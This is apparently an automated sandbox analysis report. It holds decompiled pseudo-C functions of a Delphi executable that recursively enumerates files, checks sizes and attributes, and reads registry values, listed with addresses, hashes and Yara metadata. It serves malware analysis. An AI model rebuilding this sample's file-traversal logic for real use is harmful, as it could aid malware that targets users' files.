				 *[fs:eax] = _t79 + 0xffffffe0;
				E00407080(0x4091a8, 0xb, 0xb);
				E00407080(0x4091b4, 9, 9);
				E00407080(0x4091c0, 3, 3);
				E00407080(0x4091dc, 3, 3);
				_t26 =  *0x409210; // 0x40919c
				E00407080(_t26, 0xb, 0xb); // executed
				E004070DC(__ebx, __edi, __esi, _t81); // executed
				E004049D0(0, __ebx,  &_v24, __edi, __esi);
				if(E00404F6C(_v24) > 0xa200) {
					E00407678(_t54, _t75, _t76); // executed
				}
				E00407E90(_t54, _t75, _t76); // executed
				_t60 = 3;
				_t70 = 3;
				E00407080(0x4091c4, 3, 3);
				_t36 = E00404AE8(_t54, _t75, _t76);
				_t83 = _t36;
				if(_t36 != 0) {
					E004049D0(0, _t54,  &_v28, _t75, _t76);
					_push(_v28);
					_t60 = 3;
					E004031F4( &_v32, 3, 0x4091c4);
					_t70 = _v32;
					_pop(_t47);
					_t48 = E00406FE4(_t47, _t54, _v32, _t83);
					_t84 = _t48;
					if(_t48 != 0) {
						_t70 =  &_v36;
						E004049D0(1, _t54,  &_v36, _t75, _t76);
						E00407D9C(_v36, _t54,  &_v36, _t75, _t76); // executed
					}
				}
				E004079A0(_t54, _t75, _t76, _t84); // executed
				E0040759C(_t54, _t60, _t70, _t75, _t76, _t84, _t86); // executed
				_pop(_t71);
				 *[fs:eax] = _t71;
				_push(0x408227);
				return E004030B8( &_v36, 4);
			}















                                                                                                                          0x004080e4
                                                                                                                          0x004080e4
                                                                                                                          0x004080e4
                                                                                                                          0x004080e4
                                                                                                                          0x004080e4
                                                                                                                          0x004080ec
                                                                                                                          0x004080ef
                                                                                                                          0x004080f2
                                                                                                                          0x004080f5
                                                                                                                          0x004080fd
                                                                                                                          0x00408104
                                                                                                                          0x00408105
                                                                                                                          0x0040810a
                                                                                                                          0x0040810d
                                                                                                                          0x0040811f
                                                                                                                          0x00408133
                                                                                                                          0x00408147
                                                                                                                          0x0040815b
                                                                                                                          0x00408160
                                                                                                                          0x0040816f
                                                                                                                          0x00408174
                                                                                                                          0x0040817e
                                                                                                                          0x00408190
                                                                                                                          0x00408192
                                                                                                                          0x00408192
                                                                                                                          0x00408197
                                                                                                                          0x004081a1
                                                                                                                          0x004081a6
                                                                                                                          0x004081ab
                                                                                                                          0x004081b0
                                                                                                                          0x004081b5
                                                                                                                          0x004081b7
                                                                                                                          0x004081be
                                                                                                                          0x004081c6
                                                                                                                          0x004081cf
                                                                                                                          0x004081d4
                                                                                                                          0x004081d9
                                                                                                                          0x004081dc
                                                                                                                          0x004081dd
                                                                                                                          0x004081e2
                                                                                                                          0x004081e4
                                                                                                                          0x004081e6
                                                                                                                          0x004081ee
                                                                                                                          0x004081f6
                                                                                                                          0x004081f6
                                                                                                                          0x004081e4
                                                                                                                          0x004081fb
                                                                                                                          0x00408200
                                                                                                                          0x00408207
                                                                                                                          0x0040820a
                                                                                                                          0x0040820d
                                                                                                                          0x0040821f

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileFindModule$CloseFirstHandleName
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2572062711-0
                                                                                                                          • Opcode ID: 6d70fba820807f475e386924a9e2af15878d2dd69a0bc15187a92624e301fe42
                                                                                                                          • Instruction ID: ce7274d5a0203330cd45a7cf6d0e011d083bf460e717dce8afa0a39e5ced3773
                                                                                                                          • Opcode Fuzzy Hash: 6d70fba820807f475e386924a9e2af15878d2dd69a0bc15187a92624e301fe42
                                                                                                                          • Instruction Fuzzy Hash: D4211E70B142054BEB40B7B6C95279F76A5DB88304F50493FE544BB3C2DA3DAD0586AE
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004074B4, Relevance: .1, Instructions: 81COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 60%
                                                                                                                          			E004074B4(intOrPtr __eax, void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				void* _t34;
				intOrPtr _t62;
				void* _t71;
				void* _t72;
				void* _t74;
				intOrPtr _t77;

				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_v8 = __eax;
				E004033FC(_v8);
				_push(_t77);
				_push(0x40758b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t77;
				E004031F4( &_v12, 3, 0x4091dc);
				_t49 = E004052AC(_v8, 0, _v12);
				_t71 = E0040532C(_t25) - 1;
				if(_t71 >= 0) {
					_t72 = _t71 + 1;
					_t74 = 0;
					do {
						_t34 = E0040534C(_t49, _t74);
						_t81 = _t34;
						if(_t34 == 0) {
							E00405338(_t49,  &_v28, _t74);
							E00403258( &_v24, _v28,  *((intOrPtr*)(_t49 + 0x1c)));
							E004071D0(_v24, _t49, _t72, _t74); // executed
						} else {
							E00405338(_t49,  &_v20, _t74);
							E00403258( &_v16, _v20,  *((intOrPtr*)(_t49 + 0x1c)));
							E004074B4(_v16, _t49, _t72, _t74, _t81, _a4); // executed
						}
						_t74 = _t74 + 1;
						_t72 = _t72 - 1;
					} while (_t72 != 0);
				}
				E00404520(_t49);
				_pop(_t62);
				 *[fs:eax] = _t62;
				_push(E00407592);
				return E004030B8( &_v28, 6);
			}















                                                                                                                          0x004074b9
                                                                                                                          0x004074ba
                                                                                                                          0x004074bb
                                                                                                                          0x004074bc
                                                                                                                          0x004074bd
                                                                                                                          0x004074be
                                                                                                                          0x004074c2
                                                                                                                          0x004074c8
                                                                                                                          0x004074cf
                                                                                                                          0x004074d0
                                                                                                                          0x004074d5
                                                                                                                          0x004074d8
                                                                                                                          0x004074e8
                                                                                                                          0x004074fa
                                                                                                                          0x00407505
                                                                                                                          0x00407508
                                                                                                                          0x0040750a
                                                                                                                          0x0040750b
                                                                                                                          0x0040750d
                                                                                                                          0x00407511
                                                                                                                          0x00407516
                                                                                                                          0x00407518
                                                                                                                          0x0040754a
                                                                                                                          0x00407558
                                                                                                                          0x00407560
                                                                                                                          0x0040751a
                                                                                                                          0x00407525
                                                                                                                          0x00407533
                                                                                                                          0x0040753b
                                                                                                                          0x00407540
                                                                                                                          0x00407565
                                                                                                                          0x00407566
                                                                                                                          0x00407566
                                                                                                                          0x0040750d
                                                                                                                          0x0040756b
                                                                                                                          0x00407572
                                                                                                                          0x00407575
                                                                                                                          0x00407578
                                                                                                                          0x0040758a

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: fd7c348ce77f50c17542cebb3b0538e5ca6a1de9245a361f45dd7a6b294aa538
                                                                                                                          • Instruction ID: 101897594dce54360dc52a275b3a014dbc9cabf376d6d76c5a5bbcf91f550c41
                                                                                                                          • Opcode Fuzzy Hash: fd7c348ce77f50c17542cebb3b0538e5ca6a1de9245a361f45dd7a6b294aa538
                                                                                                                          • Instruction Fuzzy Hash: 53218830B045096FCB04EF65CC8299F77A9EB84304B60447FB801B77C2DA78EE058B55
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00404DE0, Relevance: .1, Instructions: 67COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 56%
                                                                                                                          			E00404DE0(char __eax, signed int __ebx) {
				void* _v8;
				char _v12;
				void* _v16;
				char _v20;
				void* _t45;
				intOrPtr _t55;
				intOrPtr _t64;
				void* _t65;
				void* _t68;

				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_v8 = __eax;
				E004033FC(_v8);
				_push(_t64);
				_push(0x404e9f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t64;
				_t65 = E0040320C(_v8);
				_t49 = __ebx & 0xffffff00 | _t65 > 0x00000000;
				if((__ebx & 0xffffff00 | _t65 > 0x00000000) != 0) {
					E00404DCC(_v8,  &_v12);
					E0040312C( &_v8, _v12);
					if(E0040320C(_v8) >= 3) {
						_t68 = E00404CF8(_v8);
						if(_t68 == 0) {
							E00404EEC( &_v16);
							E00403358(_v16, _v8);
							if(_t68 != 0) {
								E00404EEC( &_v20);
								_t45 = E00404DE0(_v20, _t49); // executed
								if(_t45 == 0 || E00404EB0(_v8) == 0) {
								}
							}
						}
					}
				}
				_pop(_t55);
				 *[fs:eax] = _t55;
				_push(E00404EA6);
				return E004030B8( &_v20, 4);
			}












                                                                                                                          0x00404de5
                                                                                                                          0x00404de6
                                                                                                                          0x00404de7
                                                                                                                          0x00404de8
                                                                                                                          0x00404de9
                                                                                                                          0x00404dea
                                                                                                                          0x00404df0
                                                                                                                          0x00404df7
                                                                                                                          0x00404df8
                                                                                                                          0x00404dfd
                                                                                                                          0x00404e00
                                                                                                                          0x00404e0b
                                                                                                                          0x00404e0d
                                                                                                                          0x00404e12
                                                                                                                          0x00404e1a
                                                                                                                          0x00404e25
                                                                                                                          0x00404e35
                                                                                                                          0x00404e3f
                                                                                                                          0x00404e41
                                                                                                                          0x00404e49
                                                                                                                          0x00404e54
                                                                                                                          0x00404e59
                                                                                                                          0x00404e61
                                                                                                                          0x00404e69
                                                                                                                          0x00404e70
                                                                                                                          0x00404e70
                                                                                                                          0x00404e70
                                                                                                                          0x00404e59
                                                                                                                          0x00404e41
                                                                                                                          0x00404e35
                                                                                                                          0x00404e86
                                                                                                                          0x00404e89
                                                                                                                          0x00404e8c
                                                                                                                          0x00404e9e

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AttributesFile
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3188754299-0
                                                                                                                          • Opcode ID: 60dcf029e418bb4de6c98b25837b89894300ef75002f4660ff180e9b0e990edb
                                                                                                                          • Instruction ID: 1dfd328e9d81c806f2c03a8771cfa584465e3ed9e3942cc4fd01b0b075e0960a
                                                                                                                          • Opcode Fuzzy Hash: 60dcf029e418bb4de6c98b25837b89894300ef75002f4660ff180e9b0e990edb
                                                                                                                          • Instruction Fuzzy Hash: 712106B4600209EFDF00EFA5C94299EB7B8FF85304B5045BABA04B72D1D778AF04D658
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00406E94, Relevance: .0, Instructions: 47COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 37%
                                                                                                                          			E00406E94(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				char _v12;
				char _v16;
				char _v20;
				intOrPtr* _t20;
				void* _t24;
				intOrPtr _t40;
				void* _t46;

				_push(__ebx);
				_v16 = 0;
				_v20 = 0;
				_push(_t46);
				_push(0x406f22);
				_push( *[fs:eax]);
				 *[fs:eax] = _t46 + 0xfffffff0;
				E00405008( &_v16, 1, __ecx);
				_push( &_v16);
				E004031F4( &_v20, 0xb, 0x40919c);
				_pop(_t20);
				E00403214(_t20, _v20);
				_t24 = E00404C78(E0040340C(_v16), 1, 8,  &_v12, __edi, __esi); // executed
				if(_t24 != 0) {
					E004057D8(__fp0);
					asm("fcomp dword [0x406f30]");
					asm("fnstsw ax");
					asm("sahf");
				}
				_pop(_t40);
				 *[fs:eax] = _t40;
				_push(E00406F29);
				return E004030B8( &_v20, 2);
			}










                                                                                                                          0x00406e9a
                                                                                                                          0x00406e9d
                                                                                                                          0x00406ea0
                                                                                                                          0x00406ea5
                                                                                                                          0x00406ea6
                                                                                                                          0x00406eab
                                                                                                                          0x00406eae
                                                                                                                          0x00406eb6
                                                                                                                          0x00406ebe
                                                                                                                          0x00406ecc
                                                                                                                          0x00406ed4
                                                                                                                          0x00406ed5
                                                                                                                          0x00406eea
                                                                                                                          0x00406ef1
                                                                                                                          0x00406ef3
                                                                                                                          0x00406efb
                                                                                                                          0x00406f01
                                                                                                                          0x00406f03
                                                                                                                          0x00406f04
                                                                                                                          0x00406f09
                                                                                                                          0x00406f0c
                                                                                                                          0x00406f0f
                                                                                                                          0x00406f21

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LocalPathTempTime
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2118298429-0
                                                                                                                          • Opcode ID: be31c71bef31dcf0d495f0e1e2d88fef08ea193925f7f09ef08642d0a6e869a3
                                                                                                                          • Instruction ID: 68f96da1d51e9565b10b5108b435a8bc67f0bfec9723d228dfcbae9d3fbb17ab
                                                                                                                          • Opcode Fuzzy Hash: be31c71bef31dcf0d495f0e1e2d88fef08ea193925f7f09ef08642d0a6e869a3
                                                                                                                          • Instruction Fuzzy Hash: 4A0175709042099FDB00EFA5DC5159FB7BDFB45300F52857BE414F36C5DB38AA148A69
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004052AC, Relevance: .0, Instructions: 22COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E004052AC(void* __eax, void* __ecx, void* __edx) {
				void* __esi;
				void* _t7;
				intOrPtr _t11;
				void* _t14;

				_t14 = __eax;
				_t11 =  *0x40447c; // 0x404488
				_t7 = E004044F8(_t11, 0);
				E00405634(_t7, __edx, _t14, _t14, 0, __ecx); // executed
				return _t7;
			}







                                                                                                                          0x004052b4
                                                                                                                          0x004052b6
                                                                                                                          0x004052c3
                                                                                                                          0x004052cc
                                                                                                                          0x004052d7

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileFind$FirstNext
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1690352074-0
                                                                                                                          • Opcode ID: 4f493d9307b3d4b817a7e836544abeb962cbb198da26cb643227803e88156b29
                                                                                                                          • Instruction ID: b59b8e1bf290491f0b5bd01f3f1f1884d5f58955f35eb0aac9512fedb03d6d3a
                                                                                                                          • Opcode Fuzzy Hash: 4f493d9307b3d4b817a7e836544abeb962cbb198da26cb643227803e88156b29
                                                                                                                          • Instruction Fuzzy Hash: 70D0A76230111417870065BF2C84C2BF3CDCBCD565391413AB208D7341DD35AC0742B8
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00402448, Relevance: .0, Instructions: 14COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 37%
                                                                                                                          			E00402448(void* __eax) {
				void* _t3;
				void* _t6;

				if(__eax <= 0) {
					_t6 = 0;
				} else {
					_t3 =  *0x409030(); // executed
					_t6 = _t3;
					if(_t6 == 0) {
						E00402530(1);
					}
				}
				return _t6;
			}





                                                                                                                          0x0040244b
                                                                                                                          0x00402462
                                                                                                                          0x0040244d
                                                                                                                          0x0040244d
                                                                                                                          0x00402453
                                                                                                                          0x00402457
                                                                                                                          0x0040245b
                                                                                                                          0x0040245b
                                                                                                                          0x00402457
                                                                                                                          0x00402467

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 8dfeac06a829af607fe89a8817dc8f9230199d36438cef303ac21605a03e7c3b
                                                                                                                          • Instruction ID: d53205a698bee5913c9905fe3b2fa7a5b2040cee35667c8cc0b5dc0e3ef69e66
                                                                                                                          • Opcode Fuzzy Hash: 8dfeac06a829af607fe89a8817dc8f9230199d36438cef303ac21605a03e7c3b
                                                                                                                          • Instruction Fuzzy Hash: 6AC08C6030270387DB202AFA1FDC113125C3F24205300403BA901F13D3EAF8CD089A2F
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00406510, Relevance: .0, Instructions: 7COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00406510(void* __eax, void* __edx) {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				intOrPtr* _t10;

				_t3 = E00406B48(_t10, _t4, __edx, 0, _t8, _t9); // executed
				return _t3;
			}








                                                                                                                          0x00406517
                                                                                                                          0x0040651d

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: IconInfo
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2096194817-0
                                                                                                                          • Opcode ID: 3aa0d1c17f7541c88f4a23eede43810dced38d8a94ff8caad404287aac718eb2
                                                                                                                          • Instruction ID: 2c83cf8f1268621ffc1ea80895ab672af1bae2362a1aae74aa6b220125402c61
                                                                                                                          • Opcode Fuzzy Hash: 3aa0d1c17f7541c88f4a23eede43810dced38d8a94ff8caad404287aac718eb2
                                                                                                                          • Instruction Fuzzy Hash: 92A002C6751214079B4CE53F1C6292A729F07C8615759C87A7906DA289CD38E8512155
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Non-executed Functions

                                                                                                                          Function 0040D815, Relevance: 9.0, APIs: 6, Instructions: 41threadCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040C2A0: GetKeyboardType.USER32 ref: 0040C2A5
                                                                                                                            • Part of subcall function 0040C2A0: GetKeyboardType.USER32 ref: 0040C2B1
                                                                                                                          • GetCommandLineA.KERNEL32 ref: 0040D87B
                                                                                                                          • GetVersion.KERNEL32 ref: 0040D88F
                                                                                                                          • GetVersion.KERNEL32 ref: 0040D8A0
                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0040D8DC
                                                                                                                            • Part of subcall function 0040C2D0: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040C2F2
                                                                                                                            • Part of subcall function 0040C2D0: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040C325
                                                                                                                            • Part of subcall function 0040C2D0: RegCloseKey.ADVAPI32(?,004028B0,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040C33B
                                                                                                                          • GetThreadLocale.KERNEL32 ref: 0040D8BC
                                                                                                                            • Part of subcall function 0040D74C: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00403D1A), ref: 0040D772
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3734044017-0
                                                                                                                          • Opcode ID: 0632ebee869107818fc617476dd3b707cbc1511b343300be66bfea40396029a6
                                                                                                                          • Instruction ID: 917de0a484455ad82c20158439a2a24f06621c5804a29fc775aa2cf17b207d74
                                                                                                                          • Opcode Fuzzy Hash: 0632ebee869107818fc617476dd3b707cbc1511b343300be66bfea40396029a6
                                                                                                                          • Instruction Fuzzy Hash: F10129B1C113449AE711BFB1AA463193A60AB1130CF10857FD151762E2EB7D00A8DB6F
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0040F0C4, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00000000), ref: 0040F16D
                                                                                                                          • FindNextFileA.KERNEL32(00000000,?,?,?,00000000,00000000), ref: 0040F1CF
                                                                                                                          • FindClose.KERNEL32(00000000,00000000,?,?,?,00000000,00000000), ref: 0040F1D9
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Find$File$CloseFirstNext
                                                                                                                          • String ID: *.*
                                                                                                                          • API String ID: 3541575487-438819550
                                                                                                                          • Opcode ID: 1eb9b05f6550193698417fdfd1abd8b4f720dd67f104cddbbfc16bbf0ec42b4c
                                                                                                                          • Instruction ID: 21f552544a71644aa5a29d04448db43bc273ae507e021618840bae1d7485b843
                                                                                                                          • Opcode Fuzzy Hash: 1eb9b05f6550193698417fdfd1abd8b4f720dd67f104cddbbfc16bbf0ec42b4c
                                                                                                                          • Instruction Fuzzy Hash: C431B071704100ABDB15AB66D88286B37A9DF86328720457FF804EF6C7DA7CDC1A8699
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0040F0CC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 112fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00000000), ref: 0040F16D
                                                                                                                          • FindNextFileA.KERNEL32(00000000,?,?,?,00000000,00000000), ref: 0040F1CF
                                                                                                                          • FindClose.KERNEL32(00000000,00000000,?,?,?,00000000,00000000), ref: 0040F1D9
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Find$File$CloseFirstNext
                                                                                                                          • String ID: *.*
                                                                                                                          • API String ID: 3541575487-438819550
                                                                                                                          • Opcode ID: ca5e68894038c338b17cd596c0991537003cad852163082c19a1be6d7e7f9c81
                                                                                                                          • Instruction ID: 271996e333eb2d0f8e3e23676571f4307960fb9fe6b8e39aca4bbd563d4a420a
                                                                                                                          • Opcode Fuzzy Hash: ca5e68894038c338b17cd596c0991537003cad852163082c19a1be6d7e7f9c81
                                                                                                                          • Instruction Fuzzy Hash: 1031C171700100ABDB14EF67D88286B369ADF85328720457FF804EF6C7EA7CDC0A8699
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0040EB18, Relevance: 4.6, APIs: 3, Instructions: 100fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,Function_000051DB), ref: 0040EBD3
                                                                                                                          • FindNextFileA.KERNEL32(00000000,00000010), ref: 0040EC33
                                                                                                                          • FindClose.KERNEL32(00000000,00000000,00000010), ref: 0040EC43
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Find$File$CloseFirstNext
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3541575487-0
                                                                                                                          • Opcode ID: 4092cce72e1492469b29ed450f25109bd7218eb8d29261f7a9cbb69d7287a135
                                                                                                                          • Instruction ID: c0991531ddac9e0079019e73ada339c648f4459b5552238d600e3526c74abf5e
                                                                                                                          • Opcode Fuzzy Hash: 4092cce72e1492469b29ed450f25109bd7218eb8d29261f7a9cbb69d7287a135
                                                                                                                          • Instruction Fuzzy Hash: 24412C30904618DBDB21EBA6C885BDEB7B5EF48308F5045FAA404B7291D73CAE45DE58
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0040F13F, Relevance: 4.6, APIs: 3, Instructions: 74fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00000000), ref: 0040F16D
                                                                                                                          • FindNextFileA.KERNEL32(00000000,?,?,?,00000000,00000000), ref: 0040F1CF
                                                                                                                          • FindClose.KERNEL32(00000000,00000000,?,?,?,00000000,00000000), ref: 0040F1D9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Find$File$CloseFirstNext
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3541575487-0
                                                                                                                          • Opcode ID: f55870f158cee9a1d6f18cde8792f83b73ebd952d8db967ab993b5bc452fad5b
                                                                                                                          • Instruction ID: daf054dd685538e10cf0cfb88bdb67cc68ef1b402af78a2ce0ba985ddb15a516
                                                                                                                          • Opcode Fuzzy Hash: f55870f158cee9a1d6f18cde8792f83b73ebd952d8db967ab993b5bc452fad5b
                                                                                                                          • Instruction Fuzzy Hash: 44119371704100ABDA15AB27DC8296B365ADFC5364B10493FF809EF2C6DA3DDC0A8699
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0040EB16, Relevance: 3.1, APIs: 2, Instructions: 77fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,Function_000051DB), ref: 0040EBD3
                                                                                                                          • FindNextFileA.KERNEL32(00000000,00000010), ref: 0040EC33
